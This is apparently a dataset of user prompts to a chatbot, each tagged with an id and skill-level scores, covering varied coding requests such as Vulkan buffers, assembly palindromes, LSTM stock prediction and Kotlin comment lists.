void CreateSampler(uint32_t mipLevels);
void GenerateMipmaps(uint32_t width, uint32_t height, uint32_t mipLevels);
VkCommandBuffer BeginSingleTimeCommands(VkCommandPool commandPool, VkDevice device);
void EndSingleTimeCommands(VkCommandPool commandPool, VkQueue graphicsQueue, VkDevice device, VkCommandBuffer commandBuffer);
};
Window.h:
#pragma once
#define GLFW_INCLUDE_VULKAN
#include <GLFW/glfw3.h>
class Window
{
public:
Window(int width = 800, int height = 600, const char* title = "Game Engine");
~Window();
void Initialize();
void PollEvents();
void Shutdown();
bool ShouldClose() const;
GLFWwindow* GetWindow() const;
float GetDeltaTime();
private:
static void FramebufferResizeCallback(GLFWwindow* window, int width, int height);
static void keyCallback(GLFWwindow* window, int key, int scancode, int action, int mods);
int width;
int height;
const char* title;
GLFWwindow* window;
double lastFrameTime;
};
BufferUtils.cpp:
#include "BufferUtils.h"
#include <stdexcept>
namespace BufferUtils
{
void CreateBuffer(
VkDevice device, VkPhysicalDevice physicalDevice,
VkDeviceSize size, VkBufferUsageFlags usage, VkMemoryPropertyFlags properties,
VkBuffer& buffer, VkDeviceMemory& bufferMemory)
{
VkBufferCreateInfo bufferInfo{};
bufferInfo.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO;
bufferInfo.size = size;
bufferInfo.usage = usage;
bufferInfo.sharingMode = VK_SHARING_MODE_EXCLUSIVE;
if (vkCreateBuffer(device, &bufferInfo, nullptr, &buffer) != VK_SUCCESS)
{
throw std::runtime_error("Failed to create buffer!");
}
VkMemoryRequirements memRequirements;
vkGetBufferMemoryRequirements(device, buffer, &memRequirements);
VkMemoryAllocateInfo allocInfo{};
allocInfo.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO;
allocInfo.allocationSize = memRequirements.size;
allocInfo.memoryTypeIndex = FindMemoryType(physicalDevice, memRequirements.memoryTypeBits, properties);
if (vkAllocateMemory(device, &allocInfo, nullptr, &bufferMemory) != VK_SUCCESS)
{
throw std::runtime_error("Failed to allocate buffer memory!");
}
vkBindBufferMemory(device, buffer, bufferMemory, 0);
}
uint32_t FindMemoryType(VkPhysicalDevice physicalDevice, uint32_t typeFilter, VkMemoryPropertyFlags properties)
{
VkPhysicalDeviceMemoryProperties memProperties;
vkGetPhysicalDeviceMemoryProperties(physicalDevice, &memProperties);
for (uint32_t i = 0; i < memProperties.memoryTypeCount; i++)
{
if ((typeFilter & (1 << i)) && (memProperties.memoryTypes[i].propertyFlags & properties) == properties)
{
return i;
}
}
throw std::runtime_error("Failed to find suitable memory type!");
}
void CopyBuffer(
VkDevice device, VkCommandPool commandPool, VkQueue graphicsQueue,
VkBuffer srcBuffer, VkBuffer dstBuffer, VkDeviceSize size)
{
VkCommandBufferAllocateInfo allocInfo{};
allocInfo.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_ALLOCATE_INFO;
allocInfo.level = VK_COMMAND_BUFFER_LEVEL_PRIMARY;
allocInfo.commandPool = commandPool;
allocInfo.commandBufferCount = 1;
VkCommandBuffer commandBuffer;
vkAllocateCommandBuffers(device, &allocInfo, &commandBuffer);
VkCommandBufferBeginInfo beginInfo{};
beginInfo.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO;
beginInfo.flags = VK_COMMAND_BUFFER_USAGE_ONE_TIME_SUBMIT_BIT;
vkBeginCommandBuffer(commandBuffer, &beginInfo);
VkBufferCopy copyRegion{};
copyRegion.srcOffset = 0; // Optional
copyRegion.dstOffset = 0; // Optional
copyRegion.size = size;
vkCmdCopyBuffer(commandBuffer, srcBuffer, dstBuffer, 1, ©Region);
vkEndCommandBuffer(commandBuffer);
VkSubmitInfo submitInfo{};
submitInfo.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO;
submitInfo.commandBufferCount = 1;
submitInfo.pCommandBuffers = &commandBuffer;
vkQueueSubmit(graphicsQueue, 1, &submitInfo, VK_NULL_HANDLE);
vkQueueWaitIdle(graphicsQueue);
vkFreeCommandBuffers(device, commandPool, 1, &commandBuffer);
}
}
Can you improve the code for the BufferUtils class?
|
775c13317ff1f8b1bc9dc26f299e492c
|
{
"intermediate": 0.4166281521320343,
"beginner": 0.35532474517822266,
"expert": 0.22804704308509827
}
|
11,295
|
ok, look, next problem.
when gpt sends messages to me, message fragments that contain code are formatted in <code> with class="hljs language-undefined" or class="language-css hljs" or whatever.
inside the original message it looks like "`.preformatted`" or like "
|
0fce26472bd8a67056401bb724e03758
|
{
"intermediate": 0.35977235436439514,
"beginner": 0.4644617736339569,
"expert": 0.17576591670513153
}
|
11,296
|
ok, look, next problem.
when gpt sends messages to me, message fragments that contain code are formatted in <code> with class="hljs language-undefined" or class="language-css hljs" or whatever.
inside the original message it looks like "`.preformatted`" or like "
|
bbc6a3d7d8ea19baaaa235ef0edf2ac0
|
{
"intermediate": 0.35977235436439514,
"beginner": 0.4644617736339569,
"expert": 0.17576591670513153
}
|
11,297
|
ok, look, next problem.
when gpt sends messages to me, message fragments that contain code are formatted in <code> with class="hljs language-undefined" or class="language-css hljs" or whatever.
inside the original message it looks like "`.preformatted`" or like "
|
f6d8b7ac34e26c1ea55a70714718b85f
|
{
"intermediate": 0.35977235436439514,
"beginner": 0.4644617736339569,
"expert": 0.17576591670513153
}
|
11,298
|
hi
|
d4d839a9d131fa9176cf8dfe7ec606c8
|
{
"intermediate": 0.3246487081050873,
"beginner": 0.27135494351387024,
"expert": 0.40399640798568726
}
|
11,299
|
I want you to act as a qualified Python programmer an to review the following Python code. Point out potential problems with it and how it can be improved while still working as original one.
|
8436ff1d6140c2eb3876105caf5ac972
|
{
"intermediate": 0.3600691258907318,
"beginner": 0.3406076431274414,
"expert": 0.2993232309818268
}
|
11,300
|
html I have a 5 menu options I want to create a menu where you can scroll through the options with arrow key up and down and it will only show the menu option you have selected the one above and the one below
each menu option will also have a scroll bar that you can drag between 0.00 and 1.00
|
7baf66b9146cce5d1e8760ea79391ed7
|
{
"intermediate": 0.29826462268829346,
"beginner": 0.27027279138565063,
"expert": 0.4314626157283783
}
|
11,301
|
Load two images for blend based on C language and opengles3.2 version
|
f7fd01392c2f4f06353a2bffd4327ea9
|
{
"intermediate": 0.4297705590724945,
"beginner": 0.32181084156036377,
"expert": 0.24841858446598053
}
|
11,302
|
hello
|
ec68c63b9047b1cedde674124193bb88
|
{
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
}
|
11,303
|
for (int i = 0; i< Paintings.Length; i++)
{
float s;
if (Paintings[i].paidBy == IngredientUnit.Vin)
{
s = Paintings[i].price;
Debug.Log(s);
//Debug.Log(900 + 5250);
}
}
|
868e1563bfda0701a4faa1d99e3332b5
|
{
"intermediate": 0.26343944668769836,
"beginner": 0.47979414463043213,
"expert": 0.2567663788795471
}
|
11,304
|
how to force selenium chrome to use specific network interface (lets say wifi) with python on windows?
|
b888cfc5095ca5b00bdf6bd9cd7b4a1b
|
{
"intermediate": 0.35173532366752625,
"beginner": 0.18389247357845306,
"expert": 0.4643721580505371
}
|
11,305
|
correct this code please correct this code such that using same instruction like in code no other instruction but try removing errors from it and adding comments . the program should input size of palindrome between 0 to 9 and then check if its palindrome or not using stack and array for values comparision .model small
.data
m db "enter size of palindrome string 1 to 9 : $"
m1 db 0ah,0dh,"enter string : $"
m2 db 0ah,0dh,"palindrome string : $"
m3 db 0ah,0dh,"not palindrome string : $"
arr db ?
.stack 10h
.code
mov ax,@data
mov ds,ax
lea dx,m
mov ah,09
int 21h
mov ah,01
int 21h
;lea dx,m1
;mov ah,09
;int 21h
mov cl,al
mov bl,al
mov si,0
l1:
mov ah,01
int 21h
push ax
mov [arr+si],al
inc si
loop l1
mov cl,bl
mov si,0
l2:
pop ax
mov bl,[arr+si]
cmp ax,bx
je l2
jne l3
lea dx,m2
mov ah,09
int 21h
jmp ou
l3:
lea dx,m3
mov ah,09
int 21h
ou:
|
4f231100721f70e34ba8dad63f96f50b
|
{
"intermediate": 0.3557490110397339,
"beginner": 0.40510883927345276,
"expert": 0.23914216458797455
}
|
11,306
|
correct this code please correct this code such that using same instruction like in code no other instruction but try removing errors from it and adding comments . the program should input size of palindrome between 0 to 9 and then check if its palindrome or not using stack and array for values comparision .model small
.data
m db "enter size of palindrome string 1 to 9 : $"
m1 db 0ah,0dh,"enter string : $"
m2 db 0ah,0dh,"palindrome string : $"
m3 db 0ah,0dh,"not palindrome string : $"
arr db ?
.stack 10h
.code
mov ax,@data
mov ds,ax
lea dx,m
mov ah,09
int 21h
mov ah,01
int 21h
;lea dx,m1
;mov ah,09
;int 21h
mov cl,al
mov bl,al
mov si,0
l1:
mov ah,01
int 21h
push ax
mov [arr+si],al
inc si
loop l1
mov cl,bl
mov si,0
l2:
pop ax
mov bl,[arr+si]
cmp ax,bx
je l2
jne l3
lea dx,m2
mov ah,09
int 21h
jmp ou
l3:
lea dx,m3
mov ah,09
int 21h
ou:
|
6ec10d6acc3fb025977ce59d80e20dfa
|
{
"intermediate": 0.3557490110397339,
"beginner": 0.40510883927345276,
"expert": 0.23914216458797455
}
|
11,307
|
michael intends to invest 50000 in two different investments: one low risk investment that yyields 5% annually and one high risk investment that yields 14% annually. to earn 5000 in interst annually, how much money should he invest at each rate
|
22d1b29a7ab6ee6985ee550de4daf754
|
{
"intermediate": 0.4341219663619995,
"beginner": 0.24134095013141632,
"expert": 0.3245370388031006
}
|
11,308
|
correct this code please correct this code such that using same instruction like in code no other instruction but try removing errors from it and adding comments . the program should input size of palindrome between 0 to 9 and then check if its palindrome or not using stack and array for values comparision .model small
.data
m db "enter size of palindrome string 1 to 9 : $"
m1 db 0ah,0dh,"enter string : $"
m2 db 0ah,0dh,"palindrome string : $"
m3 db 0ah,0dh,"not palindrome string : $"
arr db ?
.stack 10h
.code
mov ax,@data
mov ds,ax
lea dx,m
mov ah,09
int 21h
mov ah,01
int 21h
;lea dx,m1
;mov ah,09
;int 21h
mov cl,al
mov bl,al
mov si,0
l1:
mov ah,01
int 21h
push ax
mov [arr+si],al
inc si
loop l1
mov cl,bl
mov si,0
l2:
pop ax
mov bl,[arr+si]
cmp ax,bx
je l2
jne l3
lea dx,m2
mov ah,09
int 21h
jmp ou
l3:
lea dx,m3
mov ah,09
int 21h
ou:
|
2086fc6a048e84e083d35282837d01bd
|
{
"intermediate": 0.3557490110397339,
"beginner": 0.40510883927345276,
"expert": 0.23914216458797455
}
|
11,309
|
html I have a 5 menu options I want to create a menu where you can scroll through the options with arrow key up and down and it will only show the menu option you have selected the one above and the one below
each menu option will also have a scroll bar that you can drag between 0.00 and 1.00
|
fb3d1c91ab61db8e64e661151b417a3c
|
{
"intermediate": 0.29826462268829346,
"beginner": 0.27027279138565063,
"expert": 0.4314626157283783
}
|
11,310
|
Write python code to write all prime number between 20 and 200.
|
fbcb6206812431107b29340453240d31
|
{
"intermediate": 0.3494046926498413,
"beginner": 0.24043777585029602,
"expert": 0.41015756130218506
}
|
11,311
|
Write me a Python function to simulate Blackjack
|
413c2ba92b021a470aba27e44d987553
|
{
"intermediate": 0.2478531152009964,
"beginner": 0.3843085467815399,
"expert": 0.3678382933139801
}
|
11,312
|
Write python code to list the 5 largest files on a windows system.
|
1912bd2a2beb74f1cf56188042929d61
|
{
"intermediate": 0.4041188061237335,
"beginner": 0.25970199704170227,
"expert": 0.3361791968345642
}
|
11,313
|
how to find image caption in pdf file with python deep learning
|
a555a47733c2a9c067b3547d1af1ef86
|
{
"intermediate": 0.10804246366024017,
"beginner": 0.08772779256105423,
"expert": 0.8042297959327698
}
|
11,314
|
float FullTotal = 0;
public float totalV;
public float totalS;
public float totalR;
public float totalP;
public float totalA;
float s = 0;
private void Start()
{
// Debug.Log(4500 + 2200 + 2750 + 1600);
PaidAmount(totalV, IngredientUnit.Vin, "Vinoo");
PaidAmount(totalS, IngredientUnit.Sen, "Sen");
PaidAmount(totalR, IngredientUnit.Rue, "Rue");
PaidAmount(totalP, IngredientUnit.Pur, "Pasangi");
PaidAmount(totalA, IngredientUnit.Ama, "Bandi");
FullTotal += s;
Debug.Log("total " + s);
}
public void PaidAmount(float total, IngredientUnit unit, string name)
{
//PAINTING
for (int i = 0; i < Paintings.Length; i++)
{
if (Paintings[i].paidBy == unit)
{
total += Paintings[i].price;
}
}
//FOOD
for (int i = 0; i < Food.Length; i++)
{
if (Food[i].paidBy == unit)
{
total += Food[i].price;
}
}
//DRINKS
for (int i = 0; i < Drinks.Length; i++)
{
if (Drinks[i].paidBy == unit)
{
total += Drinks[i].price;
}
}
//DECO
for (int i = 0; i < Deco.Length; i++)
{
if (Deco[i].paidBy == unit)
{
total += Deco[i].price;
}
}
s = total;
Debug.Log(name + " " + s);
}
|
9e1def3a19ed74e1822ad4f3e7c9f6db
|
{
"intermediate": 0.27275630831718445,
"beginner": 0.5071149468421936,
"expert": 0.22012880444526672
}
|
11,315
|
I used this signal generator code : def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
df = get_klines(symbol, '5m', 44640)
def signal_generator(df):
open = df.Open.iloc[-1]
close = df.Close.iloc[-1]
previous_open = df.Open.iloc[-2]
previous_close = df.Close.iloc[-2]
# Bearish pattern
if (open>close and
previous_open<previous_close and
close<previous_open and
open>=previous_close):
return 'sell'
# Bullish pattern
elif (open<close and
previous_open>previous_close and
close>previous_open and
open<=previous_close):
return 'buy'
# No clear pattern
else:
return ""
df = get_klines(symbol, '5m', 44640), but it giveing me wrong signals. Where I need to buy it returns sell and where sell returns buy
|
32f81f42f33d6d723092ff1402abe605
|
{
"intermediate": 0.46652740240097046,
"beginner": 0.3870702385902405,
"expert": 0.14640232920646667
}
|
11,316
|
Can you show me a c++ class of a base class for draggablewindows for UE5.2? I want a base class that will allow all windows be able to be draggable from the top using an overlay of the sorts in the blue print.
|
93401968ebf9761be1a7c5e51d5fd068
|
{
"intermediate": 0.3321046233177185,
"beginner": 0.3648717701435089,
"expert": 0.30302363634109497
}
|
11,317
|
i am running into an issue in my c++ opengl app. i have a vector which is supposed to store information about animation timestamps (just a regular vector), and i know that its being populated properly, but when i run a different function which gets those values, it says that my vectors have no elements and my program crashes. what could be the problem here? pointer issues?
|
d65b1417faa8bc7529156ec5305e78ee
|
{
"intermediate": 0.7258342504501343,
"beginner": 0.14263227581977844,
"expert": 0.13153356313705444
}
|
11,318
|
name of array in react what kin of letter do I use, big or small?
|
163b29bbfe214c81763b28f46d1b9b58
|
{
"intermediate": 0.5308249592781067,
"beginner": 0.23050019145011902,
"expert": 0.2386748492717743
}
|
11,319
|
that did not work, one person got way more money than they should have
|
7020703f74bbab09226347c8ff25e39e
|
{
"intermediate": 0.30691927671432495,
"beginner": 0.36418890953063965,
"expert": 0.3288917541503906
}
|
11,320
|
Explain parametric polymirphism
|
9ae717c8d97e80cbbc130ee87d5371cc
|
{
"intermediate": 0.25558578968048096,
"beginner": 0.2058563083410263,
"expert": 0.5385578870773315
}
|
11,321
|
I used your code of signal generator : df = get_klines(symbol, '1m', 44640)
def signal_generator(df):
# Calculate moving averages
df['MA_50'] = df['Close'].rolling(window=50).mean()
df['MA_200'] = df['Close'].rolling(window=200).mean()
# Determine trend direction based on moving averages
if df['MA_50'][-1] > df['MA_200'][-1]:
trend = 'bullish'
else:
trend = 'bearish'
# Check for buy/sell signals
if trend == 'bullish' and df['Close'][-1] > df['MA_50'][-1] and df['Close'][-1] > df['MA_200'][-1]:
return 'buy'
elif trend == 'bearish' and df['Close'][-1] < df['MA_50'][-1] and df['Close'][-1] < df['MA_200'][-1]:
return 'sell'
else:
return ''
df = get_klines(symbol, '1m', 44640)
, But it doesn't give me any signal
|
459d9d30e6db93a0d4e7ce44629023d2
|
{
"intermediate": 0.3426012694835663,
"beginner": 0.41255810856819153,
"expert": 0.2448405921459198
}
|
11,322
|
import { OverridableComponent } from "@mui/material/OverridableComponent";
const SidebarListProps = {
title: string,
icon: OverridableComponent<SvgIconTypeMap<{}, "svg">>,
styler: string,
styleIcon: string,
};
const SidebarList: React.FC<SidebarListProps> = ({
title,
icon: Icon,
styler,
styleIcon,
}) => {
return (
<ul className="sidebarContainer__list">
<li className={styler}>
<Icon className={styleIcon} />
{title}
</li>
</ul>
);
};
export default SidebarList;
correct this so it will be comaptible with typescript
|
7b3928f2e811dae52d55e709bf125667
|
{
"intermediate": 0.35611432790756226,
"beginner": 0.40376967191696167,
"expert": 0.24011598527431488
}
|
11,323
|
how can i overlay the miniplayer from the same package in flutter when calling shomModalBottomSheet()
|
69b6303c25342472713075996d2d5588
|
{
"intermediate": 0.5371982455253601,
"beginner": 0.20796774327754974,
"expert": 0.25483402609825134
}
|
11,324
|
Imagine we use c++ class X that inherits virtually from class A and class B. Both A and B define function void doSomething() with some implementation like printing A or B to cout. What will happen if we call function doSomething from object of class X?
|
e9c20fb143c418ce23c2018cef91cca4
|
{
"intermediate": 0.194004088640213,
"beginner": 0.7364621162414551,
"expert": 0.0695338249206543
}
|
11,325
|
Provide an example of downcasting a reference in C++
|
42407a9500053039e02d30fbee8ad59c
|
{
"intermediate": 0.2798631489276886,
"beginner": 0.3230104446411133,
"expert": 0.3971264362335205
}
|
11,326
|
write kotlin code to make a comment system using expandable list view in android.
|
be0b5c0f0ea43c82e04c3e981a3d863c
|
{
"intermediate": 0.49840807914733887,
"beginner": 0.16989004611968994,
"expert": 0.3317018449306488
}
|
11,327
|
使用pandahouse,将dataframe中的数据,以500条为一批生成一条insert语句,保存到以下数据库表
CREATE TABLE ind_cent_drive
(
ts_code String,
trade_date DateTime,
day_idx UInt32,
avgUnitUpVols Float64,
avgUnitUpNormalVols Float64,
avgUnitUpUpperVols Float64,
avgUnitUpLowerVols Float64,
avgUnitDownVols Float64,
avgUnitDownNormalVols Float64,
avgUnitDownUpperVols Float64,
avgUnitDownLowerVols Float64,
avgGapHighVols Float64,
avgGapHighNormalVols Float64,
avgGapHighUpperVols Float64,
avgGapHighLowerVols Float64,
avgGapLowVols Float64,
avgGapLowNormalVols Float64,
avgGapLowUpperVols Float64,
avgGapLowLowerVols Float64,
avgGapVols Float64,
avgGapNormalVols Float64,
avgGapUpperVols Float64,
avgGapLowerVols Float64
)
|
60363e427c19b833d3695a09677ab026
|
{
"intermediate": 0.34044843912124634,
"beginner": 0.29783105850219727,
"expert": 0.3617205023765564
}
|
11,328
|
What is a unit that unit testing refers to
|
14e4a8679dd096dec91b3f66ae4dd570
|
{
"intermediate": 0.24822452664375305,
"beginner": 0.33283528685569763,
"expert": 0.41894015669822693
}
|
11,329
|
hi
|
c5dcb7b828b409401dd50d8af1271cff
|
{
"intermediate": 0.3246487081050873,
"beginner": 0.27135494351387024,
"expert": 0.40399640798568726
}
|
11,330
|
For this code im getting this values is the model good or bad:
Train Score: 86.98 RMSE
Test Score: 178.95 RMSE
Code:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
|
79b2fa31c61b0735c77214e7917f086a
|
{
"intermediate": 0.38612034916877747,
"beginner": 0.37679043412208557,
"expert": 0.237089142203331
}
|
11,331
|
So if `(YYYYX)` format it should be `(YYYY)` remove the X write the regex for this in js
|
8c878568ab25dce7f7471ab41bee7b0c
|
{
"intermediate": 0.32694780826568604,
"beginner": 0.48824334144592285,
"expert": 0.1848088502883911
}
|
11,332
|
In this below code for stock market prediction implement the following:
1. Increasing the size of training data: More data can help the model to better understand the underlying patterns, leading to better generalization on unseen test data.
2. Regularization: You can add some regularization techniques like L1 or L2 regularization to prevent overfitting by constraining the model’s weights.
3. Simplifying the model: Reduce the complexity of the model by using fewer or smaller layers, which can prevent it from learning noise and enhance its capacity to generalize.
4. Cross-validation: Perform k-fold cross-validation to get a better estimate of the model’s performance on unseen data. This can provide more insights about the model’s generalization ability.
Code:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
# 1. Take the last look_back days (last day in this case) of the dataset
last_day = dataset[-look_back:]
# 2. Scale the input using the fitted MinMaxScaler
last_day_scaled = scaler.transform(last_day)
# 3. Reshape the input to match the required model input shape
last_day_scaled_reshaped = np.reshape(last_day_scaled, (1, 1, look_back))
# 4. Use model.predict() to predict the scaled value for ‘2021-01-02’
next_day_scaled_prediction = model.predict(last_day_scaled_reshaped)
# 5. Inverse-transform the predicted scaled value to the original range using the MinMaxScaler
next_day_prediction = scaler.inverse_transform(next_day_scaled_prediction)
# 6. Print or use the predicted value
print("Prediction for 2021-01-02: ", next_day_prediction[0][0])
|
c602cffd1c9d3062933fcdf9eac7cfcd
|
{
"intermediate": 0.36974531412124634,
"beginner": 0.31075146794319153,
"expert": 0.3195032775402069
}
|
11,333
|
Make a plot for acutal vs predicted :
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
from keras.regularizers import L1L2
from sklearn.model_selection import TimeSeriesSplit
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
look_back = 1
X, y = create_dataset(dataset, look_back)
X = np.reshape(X, (X.shape[0], 1, X.shape[1]))
# 1. Increasing the size of training data
train_size = int(len(X) * 0.9)
test_size = len(X) - train_size
X_train, X_test = X[:train_size], X[train_size:]
y_train, y_test = y[:train_size], y[train_size:]
# 4. Cross-validation
tscv = TimeSeriesSplit(n_splits=5)
for train_index, test_index in tscv.split(X_train):
X_train_cv, X_valid_cv = X_train[train_index], X_train[test_index]
y_train_cv, y_valid_cv = y_train[train_index], y_train[test_index]
# 3. Simplifying the model -reduce layers or use smaller layers
model = Sequential()
model.add(LSTM(50, input_shape=(1, look_back), kernel_regularizer=L1L2(l1=0.0, l2=0.1)))
model.add(Dense(1))
# 2. Regularization
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(X_train_cv, y_train_cv, epochs=5, batch_size=1, verbose=0, validation_data=(X_valid_cv, y_valid_cv))
trainPredict = model.predict(X_train)
